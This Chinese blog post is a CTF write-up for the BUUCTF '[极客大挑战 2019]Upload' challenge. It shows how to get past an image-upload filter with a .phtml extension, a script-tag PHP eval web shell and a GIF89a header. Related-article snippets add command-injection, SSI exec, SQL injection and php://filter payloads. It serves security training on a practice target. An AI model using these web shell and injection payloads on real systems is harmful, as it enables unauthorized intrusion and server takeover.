buuctf-web-[极客大挑战 2019]Upload-wp

最新推荐文章于 2023-01-05 15:13:39 发布
最新推荐文章于 2023-01-05 15:13:39 发布
阅读量228 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118676119
版权

[极客大挑战 2019]Upload

知识点

  • 上传phtml文件
  • 嵌在script标签中的一句话木马
  • content-type的修改
  • 请求体中的添加文件头

过程

主页就是上传点,先上传一个正常的shell.php文件

发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败

然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件

检测到<?请求体中的内容需要更改为:

<script language="php">eval($_POST['shell']);</script>

仍然不行,所以修改继续在请求头中添加一项

GIF89a
<script language="php">eval($_POST['shell']);</script>

上传成功,用后门软件连接即可,链接地址经过测试在:

http://eb74e5c1-2c38-4013-8035-e32ba42d81a4.node4.buuoj.cn/upload/shell.phtml

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUCTF-Web-随便注-wp
single7_的博客
12-14 372
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 945
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 684
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 189
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 178
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
BUUCTF web wp
vegetable223的博客
11-28 399
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1070
Upload=> 文件上传漏洞。
BUUCTF-web [极客挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2909
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5437
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 227
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf web wp
qq_63267612的博客
04-10 518
文章目录[极客挑战 2019]EasySQL [极客挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
buuctf-web-[极客挑战 2019]Knife-wp
居上
06-28 180
[极客挑战 2019]Knife 知识点 蚁剑或者中国菜刀等工具的使用 过程 主页: 直接给出这个主页就是一句话木马 蚁剑连接,根目录查看到flag
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-27 235
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
buuctf-web-[极客挑战 2019]Havefun-wp
居上
06-22 145
[极客挑战 2019]Havefun 知识点 get型传参 过程 $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } 直接传入一个参数cat ?cat=dog
buuctf-web-[极客挑战 2019]HardSQL-wp
居上
08-09 279
[极客挑战 2019]HardSQL 知识点 绕过一些简单的过滤 right() 过程 主页是一个登陆页面 过滤了关键字 and、=、空格、union等 查库 check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 查表 check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp
居上
08-10 331
[CISCN2019 华北赛区 Day2 Web1]Hack World 知识点 fuzz python盲注脚本 过程 fuzz一哈 一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等 贴上脚本: import requests url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php" result = "" num = 0 # 用
buuctf-web-[BJDCTF2020]Easy MD5-wp
居上
07-23 217
[BJDCTF2020]Easy MD5 知识点 md5 bypass(数组返回false) 过程 主页,是这么个框框 抓包发现提示 select * from 'admin' where password=md5($pass,true) 16 位 md5 常见套路,输入密码 ffifdyop,登录即可。这是因为它的原始字符串导致了' or 1=1 的 SQL 注入,相当于所谓的万能密码登录。请参考: https://www.jianshu.com/p/12125291f50d http://m
buuctf web 极客挑战2019
最新发布
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值